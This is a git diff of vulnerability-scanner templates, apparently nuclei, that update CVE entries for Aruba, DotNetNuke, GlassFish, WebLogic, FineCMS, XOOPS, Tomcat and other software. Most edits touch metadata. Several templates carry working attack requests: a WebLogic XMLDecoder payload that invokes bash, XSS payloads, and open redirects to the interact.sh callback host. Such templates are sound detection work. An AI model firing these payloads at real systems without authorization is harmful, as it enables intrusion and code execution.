index c820933c3f..32a3f7accb 100644
--- a/cves/2016/CVE-2016-8527.yaml
+++ b/cves/2016/CVE-2016-8527.yaml
@@ -1,19 +1,21 @@
 id: CVE-2016-8527
 
 info:
-  name: Aruba Airwave - (XSS)
+  name: Aruba Airwave <8.2.3.1 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS).
+  description: Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.
   reference:
     - https://www.exploit-db.com/exploits/41482
+    - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt
+    - https://www.exploit-db.com/exploits/41482/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-8527
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-8527
     cwe-id: CWE-79
-  tags: cve,cve2016,aruba,xss
+  tags: cve2016,aruba,xss,edb,cve
 
 requests:
   - method: GET
@@ -36,3 +38,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml
index 6418b76c9a..78f216197b 100644
--- a/cves/2017/CVE-2017-0929.yaml
+++ b/cves/2017/CVE-2017-0929.yaml
@@ -1,19 +1,20 @@
 id: CVE-2017-0929
 
 info:
-  name: DotNetNuke ImageHandler SSRF
+  name: DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery
   author: charanrayudu,meme-lord
   severity: high
-  description: DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
+  description: DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
   reference:
     - https://hackerone.com/reports/482634
     - https://nvd.nist.gov/vuln/detail/CVE-2017-0929
+    - https://github.com/dnnsoftware/Dnn.Platform/commit/d3953db85fee77bb5e6383747692c507ef8b94c3
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2017-0929
     cwe-id: CWE-918
-  tags: cve,cve2017,oast,ssrf,dnn,dotnetnuke
+  tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf
 
 requests:
   - method: GET
@@ -30,3 +31,5 @@ requests:
       - type: status
         status:
           - 500
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml
index e118d21521..0695b8517b 100644
--- a/cves/2017/CVE-2017-1000028.yaml
+++ b/cves/2017/CVE-2017-1000028.yaml
@@ -1,19 +1,22 @@
 id: CVE-2017-1000028
 
 info:
-  name: GlassFish LFI
+  name: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion
   author: pikpikcu,daffainfo
   severity: high
-  description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
+  description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.
   reference:
     - https://www.exploit-db.com/exploits/45196
     - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822
+    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
+    - https://www.exploit-db.com/exploits/45196/
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000028
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2017-1000028
     cwe-id: CWE-22
-  tags: cve,cve2017,oracle,glassfish,lfi
+  tags: oracle,glassfish,lfi,edb,cve,cve2017
 
 requests:
   - method: GET
@@ -37,3 +40,5 @@ requests:
           - "contains(body, 'extensions')"
           - "status_code == 200"
         condition: and
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-1000029.yaml b/cves/2017/CVE-2017-1000029.yaml
index fe30a63635..a35fd3b8a1 100644
--- a/cves/2017/CVE-2017-1000029.yaml
+++ b/cves/2017/CVE-2017-1000029.yaml
@@ -1,15 +1,17 @@
 id: CVE-2017-1000029
 
 info:
-  name: GlassFish Server Open Source Edition 3.0.1 - LFI
+  name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication.
+  description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
   reference:
     - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
     - https://www.cvedetails.com/cve/CVE-2017-1000029
+    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000029
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2017-1000029
     cwe-id: CWE-200
@@ -29,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml
index 2469274848..fe5f26d393 100644
--- a/cves/2017/CVE-2017-1000170.yaml
+++ b/cves/2017/CVE-2017-1000170.yaml
@@ -1,18 +1,21 @@
 id: CVE-2017-1000170
 
 info:
-  name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal
+  name: WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion
   author: dwisiswant0
   severity: high
-  description: jqueryFileTree 2.1.5 and older Directory Traversal
+  description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.
   reference:
     - https://www.exploit-db.com/exploits/49693
+    - https://github.com/jqueryfiletree/jqueryfiletree/issues/66
+    - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000170
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2017-1000170
     cwe-id: CWE-22
-  tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery
+  tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm
 
 requests:
   - method: POST
@@ -30,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml
index 703697b544..091a2595c1 100644
--- a/cves/2017/CVE-2017-1000486.yaml
+++ b/cves/2017/CVE-2017-1000486.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2017-1000486
     cwe-id: CWE-326
-  tags: cve,cve2017,primetek,rce,injection
+  tags: cve,cve2017,primetek,rce,injection,kev
 
 requests:
   - raw:
diff --git a/cves/2017/CVE-2017-10075.yaml b/cves/2017/CVE-2017-10075.yaml
index c7c5da7c14..d5bc0d6f77 100644
--- a/cves/2017/CVE-2017-10075.yaml
+++ b/cves/2017/CVE-2017-10075.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
     - https://nvd.nist.gov/vuln/detail/CVE-2017-10075
+    - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
     cvss-score: 8.2
diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml
index af77696479..dd344c5421 100644
--- a/cves/2017/CVE-2017-10271.yaml
+++ b/cves/2017/CVE-2017-10271.yaml
@@ -1,20 +1,21 @@
 id: CVE-2017-10271
 
 info:
-  name: Oracle Fusion Middleware WebLogic Server - Remote Command Execution
-  author: dr_set
+  name: Oracle WebLogic Server - Remote Command Execution
+  author: dr_set,ImNightmaree
   severity: high
-  description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to component deserialization remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Unauthenticated attackers with network access via T3 can leverage this vulnerability to compromise Oracle WebLogic Server.
+  description: |
+    The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
   reference:
     - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
     - https://github.com/SuperHacker-liuan/cve-2017-10271-poc
-    - https://www.oracle.com/security-alerts/cpuoct2017.html
+    - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
     - https://nvd.nist.gov/vuln/detail/CVE-2017-10271
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
     cvss-score: 7.5
     cve-id: CVE-2017-10271
-  tags: cve,cve2017,rce,oracle,weblogic,oast
+  tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle
 
 requests:
   - raw:
@@ -41,7 +42,7 @@ requests:
                                     <string>-c</string>
                                 </void>
                                 <void index="2">
-                                    <string>nslookup {{interactsh-url}}</string>
+                                    <string>interact.sh</string>
                                 </void>
                             </array>
                             <void method="start"/></void>
@@ -51,15 +52,47 @@ requests:
             <soapenv:Body/>
         </soapenv:Envelope>
 
-    matchers-condition: and
+      - |
+        POST /wls-wsat/CoordinatorPortType HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Accept-Language: en
+        Content-Type: text/xml
+
+        <?xml version="1.0" encoding="utf-8"?>
+          <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+              <soapenv:Header>
+                  <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+                      <java>
+                          <void class="java.lang.Thread" method="currentThread">
+                              <void method="getCurrentWork">
+                                  <void method="getResponse">
+                                      <void method="getServletOutputStream">
+                                          <void method="flush"/>
+                                      </void>
+                                      <void method="getWriter"><void method="write"><string>{{randstr}}</string></void></void>
+                                  </void>
+                              </void>
+                          </void>
+                      </java>
+                  </work:WorkContext>
+              </soapenv:Header>
+              <soapenv:Body/>
+        </soapenv:Envelope>
+
+    stop-at-first-match: true
+    matchers-condition: or
     matchers:
-      - type: word
-        part: interactsh_protocol  # Confirms the DNS interaction
-        words:
-          - "dns"
+      - type: dsl
+        dsl:
+          - regex("<faultstring>.*</faultstring>", body)
+          - status_code == 500
+        condition: and
 
-      - type: status
-        status:
-          - 500
+      - type: dsl
+        dsl:
+          - body == "{{randstr}}"
+          - status_code == 200
+        condition: and
 
-# Enhanced by mp on 2022/04/20
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-10974.yaml b/cves/2017/CVE-2017-10974.yaml
index 1bef1f633f..52ff2715d0 100644
--- a/cves/2017/CVE-2017-10974.yaml
+++ b/cves/2017/CVE-2017-10974.yaml
@@ -1,19 +1,21 @@
 id: CVE-2017-10974
 
 info:
-  name: Yaws 1.91 - Remote File Disclosure
+  name: Yaws 1.91 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Yaws 1.91 allows Unauthenticated Remote File Disclosure via HTTP Directory Traversal with /%5C../ to port 8080
+  description: Yaws 1.91 allows unauthenticated local file inclusion via  /%5C../ submitted to port 8080.
   reference:
     - https://www.exploit-db.com/exploits/42303
     - https://nvd.nist.gov/vuln/detail/CVE-2017-10974
+    - http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt
+    - https://www.exploit-db.com/exploits/42303/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2017-10974
     cwe-id: CWE-22
-  tags: cve,cve2017,yaws,lfi
+  tags: edb,cve,cve2017,yaws,lfi
 
 requests:
   - method: GET
@@ -32,4 +34,6 @@ requests:
 
       - type: dsl
         dsl:
-          - '!contains(tolower(body), "<html")'
\ No newline at end of file
+          - '!contains(tolower(body), "<html")'
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-11512.yaml b/cves/2017/CVE-2017-11512.yaml
index d5a5f7edbf..047cf74808 100644
--- a/cves/2017/CVE-2017-11512.yaml
+++ b/cves/2017/CVE-2017-11512.yaml
@@ -1,23 +1,26 @@
 id: CVE-2017-11512
 
 info:
-  name: ManageEngine ServiceDesk - Arbitrary File Retrieval
+  name: ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval
   author: 0x_Akoko
   severity: high
   description: |
-    The ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
+    ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
   reference:
     - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html
     - https://www.cvedetails.com/cve/CVE-2017-11512
+    - https://www.tenable.com/security/research/tra-2017-31
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-11512
+    - https://web.archive.org/web/20210116180015/https://www.securityfocus.com/bid/101789/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2017-11512
     cwe-id: CWE-22
   metadata:
-    verified: true
     shodan-query: http.title:"ManageEngine"
-  tags: cve,cve2017,manageengine,lfr,unauth
+    verified: "true"
+  tags: cve,cve2017,manageengine,lfr,unauth,tenable
 
 requests:
   - method: GET
@@ -34,3 +37,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-11586.yaml b/cves/2017/CVE-2017-11586.yaml
new file mode 100644
index 0000000000..4b939cb7d6
--- /dev/null
+++ b/cves/2017/CVE-2017-11586.yaml
@@ -0,0 +1,39 @@
+id: CVE-2017-11586
+
+info:
+  name: FineCms < 5.0.9 - Open redirect
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action.
+  reference:
+    - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-11586
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2017-11586
+    cwe-id: CWE-601
+  metadata:
+    verified: "true"
+  tags: cve,cve2017,redirect,finecms
+
+requests:
+  - raw:
+      - |
+        POST /index.php?s=member&c=login&m=index HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        back=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1
+
+      - |
+        GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - 'Refresh:(.*)url=http:\/\/interact\.sh'
diff --git a/cves/2017/CVE-2017-11610.yaml b/cves/2017/CVE-2017-11610.yaml
index 61d6b13b95..ac5a9f54d6 100644
--- a/cves/2017/CVE-2017-11610.yaml
+++ b/cves/2017/CVE-2017-11610.yaml
@@ -1,13 +1,15 @@
 id: CVE-2017-11610
 
 info:
-  name: Supervisor XMLRPC Exec
+  name: XML-RPC Server - Remote Code Execution
   author: notnotnotveg
   severity: high
-  description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.
+  description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups.
   reference:
     - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
     - https://nvd.nist.gov/vuln/detail/CVE-2017-11610
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -15,7 +17,7 @@ info:
     cwe-id: CWE-276
   metadata:
     shodan-query: http.title:"Supervisor Status"
-  tags: cve,cve2017,rce,supervisor,oast,xmlrpc
+  tags: oast,xmlrpc,msf,cve,cve2017,rce,supervisor
 
 requests:
   - raw:
@@ -52,3 +54,5 @@ requests:
           - "<methodResponse>"
           - "<int>"
         condition: and
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-11629.yaml b/cves/2017/CVE-2017-11629.yaml
new file mode 100644
index 0000000000..5cb529d6b9
--- /dev/null
+++ b/cves/2017/CVE-2017-11629.yaml
@@ -0,0 +1,43 @@
+id: CVE-2017-11629
+
+info:
+  name: FineCMS <=5.0.10 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.
+  reference:
+    - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
+    - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2017-11629
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2017,xss,finecms
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>p不存在'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2017/CVE-2017-12138.yaml b/cves/2017/CVE-2017-12138.yaml
new file mode 100644
index 0000000000..2931b0c317
--- /dev/null
+++ b/cves/2017/CVE-2017-12138.yaml
@@ -0,0 +1,37 @@
+id: CVE-2017-12138
+
+info:
+  name: XOOPS Core 2.5.8 - Open Redirect
+  author: 0x_Akoko
+  severity: medium
+  description: XOOPS Core 2.5.8 has a stored URL redirect bypass vulnerability in /modules/profile/index.php because of the URL filter.
+  reference:
+    - https://github.com/XOOPS/XoopsCore25/issues/523
+    - https://xoops.org
+    - https://www.cvedetails.com/cve/CVE-2017-12138
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2017-12138
+    cwe-id: CWE-601
+  tags: cve,cve2017,redirect,xoops,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /user.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
+
+      - |
+        GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml
index 01f2e0f6f9..a9cd3220db 100644
--- a/cves/2017/CVE-2017-12149.yaml
+++ b/cves/2017/CVE-2017-12149.yaml
@@ -4,17 +4,18 @@ info:
   name: Jboss Application Server - Remote Code Execution
   author: fopina
   severity: critical
-  description: "Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because  the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data."
+  description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because  the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data.
   reference:
     - https://chowdera.com/2020/12/20201229190934023w.html
     - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
     - https://nvd.nist.gov/vuln/detail/CVE-2017-12149
+    - https://bugzilla.redhat.com/show_bug.cgi?id=1486220
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2017-12149
     cwe-id: CWE-502
-  tags: cve,cve2017,jboss,java,rce,deserialization
+  tags: java,rce,deserialization,kev,vulhub,cve,cve2017,jboss
 
 requests:
   - raw:
diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml
index e177b04912..22e1e6690d 100644
--- a/cves/2017/CVE-2017-12542.yaml
+++ b/cves/2017/CVE-2017-12542.yaml
@@ -8,11 +8,13 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/44005
     - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
+    - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
+    - https://www.exploit-db.com/exploits/44005/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2017-12542
-  tags: cve,cve2017,ilo4,hpe,auth-bypass
+  tags: ilo4,hpe,auth-bypass,edb,cve,cve2017
 
 requests:
   - method: GET
diff --git a/cves/2017/CVE-2017-12544.yaml b/cves/2017/CVE-2017-12544.yaml
index 33051417f0..f6ca7ef1ca 100644
--- a/cves/2017/CVE-2017-12544.yaml
+++ b/cves/2017/CVE-2017-12544.yaml
@@ -1,37 +1,40 @@
-id: CVE-2017-12544
+id: CVE-2017-12544
 
-info:
-  name: HPE System Management - XSS
-  author: divya_mudgal
-  severity: medium
-  description: Reflected Cross-site scripting (XSS) on HPE System Management
-  reference:
-    - https://seclists.org/fulldisclosure/2018/Mar/5
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-12544
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 5.4
-    cve-id: CVE-2017-12544
-    cwe-id: CWE-79
-  tags: cve,cve2017,xss,hp
+info:
+  name: HPE System Management - Cross-Site Scripting
+  author: divya_mudgal
+  severity: medium
+  description: HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  reference:
+    - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us
+    - http://web.archive.org/web/20211206092413/https://securitytracker.com/id/1039437
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-12544
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2017-12544
+    cwe-id: CWE-79
+  tags: cve,cve2017,xss,hp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "var prodName = '';prompt`document.domain`;//';"
-        part: body
-
-      - type: word
-        words:
-          - "text/html"
-        part: header
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "var prodName = '';prompt`document.domain`;//';"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-12583.yaml b/cves/2017/CVE-2017-12583.yaml
index 3fcc19e269..4d088e27f0 100644
--- a/cves/2017/CVE-2017-12583.yaml
+++ b/cves/2017/CVE-2017-12583.yaml
@@ -1,12 +1,13 @@
 id: CVE-2017-12583
 
 info:
-  name: Reflected XSS in doku.php
+  name: DokuWiki - Cross-Site Scripting
   author: DhiyaneshDK
   severity: medium
-  description: DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php.
+  description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - https://github.com/splitbrain/dokuwiki/issues/2061
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-12583
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml
index 97c997a6bd..39a22529cf 100644
--- a/cves/2017/CVE-2017-12611.yaml
+++ b/cves/2017/CVE-2017-12611.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - https://struts.apache.org/docs/s2-053.html
     - https://nvd.nist.gov/vuln/detail/CVE-2017-12611
+    - https://kb.netapp.com/support/s/article/ka51A000000CgttQAC/NTAP-20170911-0001
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml
index c95a8798bb..ad6f801c1f 100644
--- a/cves/2017/CVE-2017-12615.yaml
+++ b/cves/2017/CVE-2017-12615.yaml
@@ -1,22 +1,25 @@
 id: CVE-2017-12615
 
 info:
-  name: Apache Tomcat RCE
+  name: Apache Tomcat Servers - Remote Code Execution
   author: pikpikcu
   severity: high
   description: |
-    By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
-    This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
-    However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
-    Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
+    Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
+    - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E
+    - http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-12615
+    - http://web.archive.org/web/20210616200000/https://www.securityfocus.com/bid/100901
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.1
     cve-id: CVE-2017-12615
     cwe-id: CWE-434
